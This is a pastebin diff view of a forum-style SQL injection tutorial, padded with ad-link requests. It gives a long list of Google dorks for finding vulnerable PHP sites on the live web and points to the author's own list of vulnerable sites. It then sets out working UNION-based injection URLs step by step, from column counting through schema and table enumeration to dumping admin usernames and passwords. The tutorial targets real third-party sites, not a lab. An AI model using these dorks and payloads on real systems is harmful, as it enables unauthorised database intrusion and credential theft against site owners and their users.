View difference between Paste ID: <a href="/pKmj2gQi">pKmj2gQi</a> and <a href="/WGg03SFB">WGg03SFB</a>

 if you want to support me on making more tutorials, it only cost's 5 seconds of your life :-) and you get to see many more tutorials (Y)
1		if you want to support me on making more tutorials, it only cost's 5 seconds of your life :-) and you get to see many more tutorials (Y)
2
3		http://adf.ly/3pnxG
4
5		visit this site also :-)
6
7		http://acttodaynow.blogspot.com/
8
9		Thank you<3
10
11		Introduction:
12
13		Sqli (aka SQL Injection OR Structured Query LANGUAGE Injection) IS the FIRST step IN the entry TO exploiting OR hacking websites. It IS easily done AND it IS a great starting off point. Unfortunately most sqli tutorials suck, so that IS why I am writing this one. Sqli IS just basically injecting queries INTO a DATABASE OR USING queries TO GET authorization bypass AS an admin.
14
15		Finding Sites TO Inject:
16
17		Finding SQLI Vulnerable sits IS extremely easy ALL you need TO do IS SOME googling. The FIRST thing you need TO do are find SOME dorks.
18
19		SQLI DORKS:
20		Code:
21		inurl:trainers.php?id=
22		inurl:buy.php?category=
23		inurl:article.php?ID=
24		inurl:play_old.php?id=
25		inurl:declaration_more.php?decl_id=
26		inurl:pageid=
27		inurl:games.php?id=
28		inurl:page.php?file=
29		inurl:newsDetail.php?id=
30		inurl:gallery.php?id=
31		inurl:article.php?id=
32		inurl:SHOW.php?id=
33		inurl:staff_id=
34		inurl:newsitem.php?num=
35		inurl:readnews.php?id=
36		inurl:top10.php?cat=
37		inurl:historialeer.php?num=
38		inurl:reagir.php?num=
39		inurl:Stray-Questions-VIEW.php?num=
40		inurl:forum_bds.php?num=
41		inurl:game.php?id=
42		inurl:view_product.php?id=
43		inurl:newsone.php?id=
44		inurl:sw_comment.php?id=
45		inurl:news.php?id=
46		inurl:avd_start.php?avd=
47		inurl:event.php?id=
48		inurl:product-item.php?id=
49		inurl:SQL.php?id=
50		inurl:news_view.php?id=
51		inurl:select_biblio.php?id=
52		inurl:humor.php?id=
53		inurl:aboutbook.php?id=
54		inurl:ogl_inet.php?ogl_id=
55		inurl:fiche_spectacle.php?id=
56		inurl:communique_detail.php?id=
57		inurl:sem.php3?id=
58		inurl:kategorie.php4?id=
59		inurl:news.php?id=
60		inurl:INDEX.php?id=
61		inurl:faq2.php?id=
62		inurl:show_an.php?id=
63		inurl:preview.php?id=
64		inurl:loadpsb.php?id=
65		inurl:opinions.php?id=
66		inurl:spr.php?id=
67		inurl:pages.php?id=
68		inurl:announce.php?id=
69		inurl:clanek.php4?id=
70		inurl:participant.php?id=
71		inurl:download.php?id=
72		inurl:main.php?id=
73		inurl:review.php?id=
74		inurl:chappies.php?id=
75		inurl:READ.php?id=
76		inurl:prod_detail.php?id=
77		inurl:viewphoto.php?id=
78		inurl:article.php?id=
79		inurl:person.php?id=
80		inurl:productinfo.php?id=
81		inurl:showimg.php?id=
82		inurl:VIEW.php?id=
83		inurl:website.php?id=
84		inurl:hosting_info.php?id=
85		inurl:gallery.php?id=
86		inurl:rub.php?idr=
87		inurl:view_faq.php?id=
88		inurl:artikelinfo.php?id=
89		inurl:detail.php?ID=
90		inurl:INDEX.php?=
91		inurl:profile_view.php?id=
92		inurl:category.php?id=
93		inurl:publications.php?id=
94		inurl:fellows.php?id=
95		inurl:downloads_info.php?id=
96		inurl:prod_info.php?id=
97		inurl:shop.php?do=part&id=
98		inurl:productinfo.php?id=
99		inurl:collectionitem.php?id=
100		inurl:band_info.php?id=
101		inurl:product.php?id=
102		inurl:releases.php?id=
103		inurl:ray.php?id=
104		inurl:produit.php?id=
105		inurl:pop.php?id=
106		inurl:shopping.php?id=
107		inurl:productdetail.php?id=
108		inurl:post.php?id=
109		inurl:viewshowdetail.php?id=
110		inurl:clubpage.php?id=
111		inurl:memberInfo.php?id=
112		inurl:SECTION.php?id=
113		inurl:theme.php?id=
114		inurl:page.php?id=
115		inurl:shredder-categories.php?id=
116		inurl:tradeCategory.php?id=
117		inurl:product_ranges_view.php?ID=
118		inurl:shop_category.php?id=
119		inurl:transcript.php?id=
120		inurl:channel_id=
121		inurl:item_id=
122		inurl:newsid=
123		inurl:trainers.php?id=
124		inurl:news-FULL.php?id=
125		inurl:news_display.php?getid=
126		inurl:index2.php?OPTION=
127		inurl:readnews.php?id=
128		inurl:top10.php?cat=
129		inurl:newsone.php?id=
130		inurl:event.php?id=
131		inurl:product-item.php?id=
132		inurl:SQL.php?id=
133		inurl:aboutbook.php?id=
134		inurl:preview.php?id=
135		inurl:loadpsb.php?id=
136		inurl:pages.php?id=
137		inurl:material.php?id=
138		inurl:clanek.php4?id=
139		inurl:announce.php?id=
140		inurl:chappies.php?id=
141		inurl:READ.php?id=
142		inurl:viewapp.php?id=
143		inurl:viewphoto.php?id=
144		inurl:rub.php?idr=
145		inurl:galeri_info.php?l=
146		inurl:review.php?id=
147		inurl:iniziativa.php?IN=
148		inurl:curriculum.php?id=
149		inurl:labels.php?id=
150		inurl:story.php?id=
151		inurl:look.php?ID=
152		inurl:newsone.php?id=
153		inurl:aboutbook.php?id=
154		inurl:material.php?id=
155		inurl:opinions.php?id=
156		inurl:announce.php?id=
157		inurl:rub.php?idr=
158		inurl:galeri_info.php?l=
159		inurl:tekst.php?idt=
160		inurl:newscat.php?id=
161		inurl:newsticker_info.php?idn=
162		inurl:rubrika.php?idr=
163		inurl:rubp.php?idr=
164		inurl:offer.php?idf=
165		inurl:art.php?idm=
166		inurl:title.php?id=
167		buy.php?category=
168		article.php?ID=
169		play_old.php?id=
170		declaration_more.php?decl_id=
171		Pageid=
172		games.php?id=
173		page.php?file=
174		newsDetail.php?id=
175		gallery.php?id=
176		article.php?id=
177		play_old.php?id=
178		SHOW.php?id=
179		staff_id=
180		newsitem.php?num=
181		readnews.php?id=
182		top10.php?cat=
183		historialeer.php?num=
184		reagir.php?num=
185		forum_bds.php?num=
186		game.php?id=
187		view_product.php?id=
188		newsone.php?id=
189		sw_comment.php?id=
190		news.php?id=
191		avd_start.php?avd=
192		event.php?id=
193		product-item.php?id=
194		SQL.php?id=
195		news_view.php?id=
196		select_biblio.php?id=
197		humor.php?id=
198		aboutbook.php?id=
199		fiche_spectacle.php?id=
200		communique_detail.php?id=
201		sem.php3?id=
202		kategorie.php4?id=
203		faq2.php?id=
204		show_an.php?id=
205		preview.php?id=
206		loadpsb.php?id=
207		opinions.php?id=
208		spr.php?id=
209		pages.php?id=
210		announce.php?id=
211		clanek.php4?id=
212		participant.php?id=
213		download.php?id=
214		main.php?id=
215		review.php?id=
216		chappies.php?id=
217		READ.php?id=
218		prod_detail.php?id=
219		viewphoto.php?id=
220		article.php?id=
221		play_old.php?id=
222		declaration_more.php?decl_id=
223		category.php?id=
224		publications.php?id=
225		fellows.php?id=
226		downloads_info.php?id=
227		prod_info.php?id=
228		shop.php?do=part&id=
229		Productinfo.php?id=
230		website.php?id=
231		Productinfo.php?id=
232		showimg.php?id=
233		VIEW.php?id=
234		rub.php?idr=
235		view_faq.php?id=
236		artikelinfo.php?id=
237		detail.php?ID=
238		collectionitem.php?id=
239		band_info.php?id=
240		product.php?id=
241		releases.php?id=
242		ray.php?id=
243		produit.php?id=
244		pop.php?id=
245		shopping.php?id=
246		productdetail.php?id=
247		post.php?id=
248		viewshowdetail.php?id=
249		clubpage.php?id=
250		memberInfo.php?id=
251		SECTION.php?id=
252		theme.php?id=
253		page.php?id=
254		shredder-categories.php?id=
255		tradeCategory.php?id=
256		shop_category.php?id=
257		transcript.php?id=
258		channel_id=
259		item_id=
260		newsid=
261		trainers.php?id=
262		buy.php?category=
263		article.php?ID=
264		play_old.php?id=
265		iniziativa.php?IN=
266		detail_new.php?id=
267		tekst.php?idt=
268		newscat.php?id=
269		newsticker_info.php?idn=
270		rubrika.php?idr=
271		rubp.php?idr=
272		offer.php?idf=
273		hotel.php?id=
274		art.php?idm=
275		title.php?id=
276		look.php?ID=
277		story.php?id=
278		labels.php?id=
279		review.php?id=
280		chappies.php?id=
281		news-FULL.php?id=
282		news_display.php?getid=
283		index2.php?OPTION=
284		ages.php?id=
285		"id=" & intext:"Warning: mysql_fetch_assoc()
286		"id=" & intext:"Warning: mysql_fetch_array()
287		"id=" & intext:"Warning: mysql_num_rows()
288		"id=" & intext:"Warning: session_start()
289		"id=" & intext:"Warning: getimagesize()
290		"id=" & intext:"Warning: UNKNOWN()
291		"id=" & intext:"Warning: pg_exec()
292		"id=" & intext:"Warning: array_merge()
293		"id=" & intext:"Warning: mysql_result()
294		"id=" & intext:"Warning: mysql_num_rows()
295		"id=" & intext:"Warning: mysql_query()
296		"id=" & intext:"Warning: filesize()
297		"id=" & intext:"Warning: require()
298
299		Pick one of those dorks and add inurl: before it
300		(If they do not already have it) and then copy and paste
301		it into google. Pick one of the sites off google and go to it.
302		For example the url of the page you are on may look like this
303
304		Code:
305		http://www.example.com/index.php?id=3
306
307		To check that it is vulnerable all you have to do is
308		put a ' at the end of the url. So now your url should
309		Look like this
310		Code:
311		http://www.example.com/index.php?id=3'
312
313		Press enter and you get some kind of error. The errors will vary
314		but it should look something like this
315
316		http://i982.photobucket.com/albums/ae308/blink1337/1.png
317		Image exceeds set limits. Click to view full size image
318
319
320		If an error happends that site is vulerable!
321
322		Also If you are lazy you can check
323		my list of vulnerable sites here
324
325		http://allianceforums.co.cc/forums/thread-1249.html
326
327		Getting Number of Columns
328
329		After you find your vulnerable site the first step you need to take is
330		to find the number of columns. The easiest way to do this is
331		use the statement "ORDER BY". All you have to do is put ORDER BY (number)--
332		at the end of your url. So it should look like this.
333
334		Code:
335		http://www.example.com/index.php?id=3 ORDER BY (number)--
336
337		You want to start with ORDER BY 1-- and keep increasing the number by 1 until you get an error.
338
339		For example
340
341		Code:
342		http://www.example.com/index.php?id=3 order by 1--
343		http://www.example.com/index.php?id=3 order by 2--
344		http://www.example.com/index.php?id=3 order by 3--
345		http://www.example.com/index.php?id=3 order by 4--
346		http://www.example.com/index.php?id=3 order by 5--
347		http://www.example.com/index.php?id=3 order by 6--
348		http://www.example.com/index.php?id=3 order by 7--
349		http://www.example.com/index.php?id=3 order by 8--
350
351		Lets say on order by 8-- you get an error page. This means that the website has 7 columns because
352		it will give you errors on anything over 7. If you have a bad memory you should open notepad and
353		write the # of columns you find.
354
355		Finding Acsessable Columns
356
357		Now that we have the number of columns we need to get the column numbers that we can grab information from.
358		We do this by by using the "UNION" "SELECT" and Number of columns. You put them together in your
359		url like this
360		Code:
361		http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
362
363		For the end part of the url, (1,2,3,4,5,6,7) You put the number of columns
364		you found in the first step. Since I found that the site I was testing had 7
365		columns I put 1,2,3,4,5,6,7. Also remeber to put a - infront of the id number.
366		After you do that you should get something like this...
367
368
369		The page should look a bit fucked up and there should be 2 numbers on the page.
370		These two numbers are the colum numbers we can get information from. We will replace them with statements later on so
371		write them down or remeber them.
372
373		Finding MySQL Database Version
374		The reasons you need the database name is to see weather or not the website is worth your time
375		because any msql database under 5 you will have to blindly guess the table and column names.
376		If you are a begginer and you find that the database is below 5 I urge you to find
377		a different site.
378
379		Now we take one of the numbers that we found from the step above and replace it with @@version
380		For Example, before our url looked like this
381		Code:
382		http://www.example.com/index.php?id=-3+UNION+SELECT+1,2,3,4,5,6,7--
383
384		Now since we will replace the 1 with @@version
385
386		Code:
387		http://www.example.com/index.php?id=-3+UNION+SELECT+@@version,2,3,4,5,6,7--
388		Press enter and now the page should display the database number.
389
390
391		Now the number that we had in the first step will be replaced with the database number. As it shows above
392		The site that I am testing has a version number of 5.0.45. Since this number is 5 or above we will continue working on
393		this site.
394
395		Finding Database Names
396
397		Next we are going to inject the website to find the database names. We do this by replacing @@version
398		with group_concat(schema_name) and also add + from+information_schema.schemata-- after the last number in our url
399		So now our url should look like this
400
401		Code:
402		http://www.example.com/index.php?id=-3+UNION+SELECT+group_concat(schema_name),2,3,4,5,6,7+ from+information_schema.schemata--
403
404
405		It will list the database names. Now to find which one is currently in use replace group_concat(schema_name) with
406		concat(database()) and delete + from+information_schema.schemata So the url should now look like this
407
408		Code:
409		http://www.example.com/index.php?id=-3+UNION+SELECT+concat(database()),2,3,4,5,6,7--
410		It will display which database which is in use. You may want to write it down.
411
412
413		Finding Table Names
414
415
416		To get table names of current database you need to replace concat(database()) with group_concat(table_name)
417		and add from information_schema.tables where table_schema=database() between the last number and the -- also remove the
418		+ signs from the union select. Now your url should look like this
419
420		Code:
421		http://www.example.com/index.php?id=-3 union select group_concat(table_name),2,3,4,5,6,7 from information_schema.tables where table_schema=database()--
422
423		The page should now show the Table names. You may want to write them down.
424
425		http://i982.photobucket.com/albums/ae308/blink1337/untitled-1.png
426		Image exceeds set limits. Click to view full size image
427
428
429
430		Finding Column Names
431
432		This is exactly like getting table names you just change table_name to column_name and information_schema.tables to information_schema.columns.
433		So your url should look like.
434
435		Code:
436		http://www.example.com/index.php?id=-3 union select group_concat(column_name),2,3,4,5,6,7 from information_schema.columns where table_schema=database()--
437
438		This should give you the column names. You may want to write them down.
439
440		Lets say they gave us back the cloumn names
441
442		admin_username
443		admin_password
444
445		Getting Information
446
447		Now we can have the database name, table names, and colomn names we can put them together and
448		pull information from them. Do to this we need to put the following in our url.
449		Code:
450		http://www.example.com/index.php?id=-3 union select 1,group_concat(Columnname,0x3a,columnname,0x3a),2,3,4,5,6,7 from databasename.tablename--
451
452		Now replace columnname with the column names you want infomation from. The 0x3a will make a : to seperate the information
453	-
453	+
454		With the database name and the table name the column names where in. After all this your url should look something
455		like this.
456
457		Code:
458		http://www.example.com/index.php?id=-3 union select 1,group_concat(admin_username,0x3a,admin_password,0x3a),2,3,4,5,6,7 from whippit.t_admin--
459
460		Now you should get usernames and passwords for the admin or what ever information you wanted to get.
461
462
463